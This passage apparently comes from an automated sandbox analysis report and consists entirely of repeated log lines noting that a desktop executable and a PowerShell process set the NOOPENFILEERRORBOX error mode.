                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\lfQuSBwdSf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
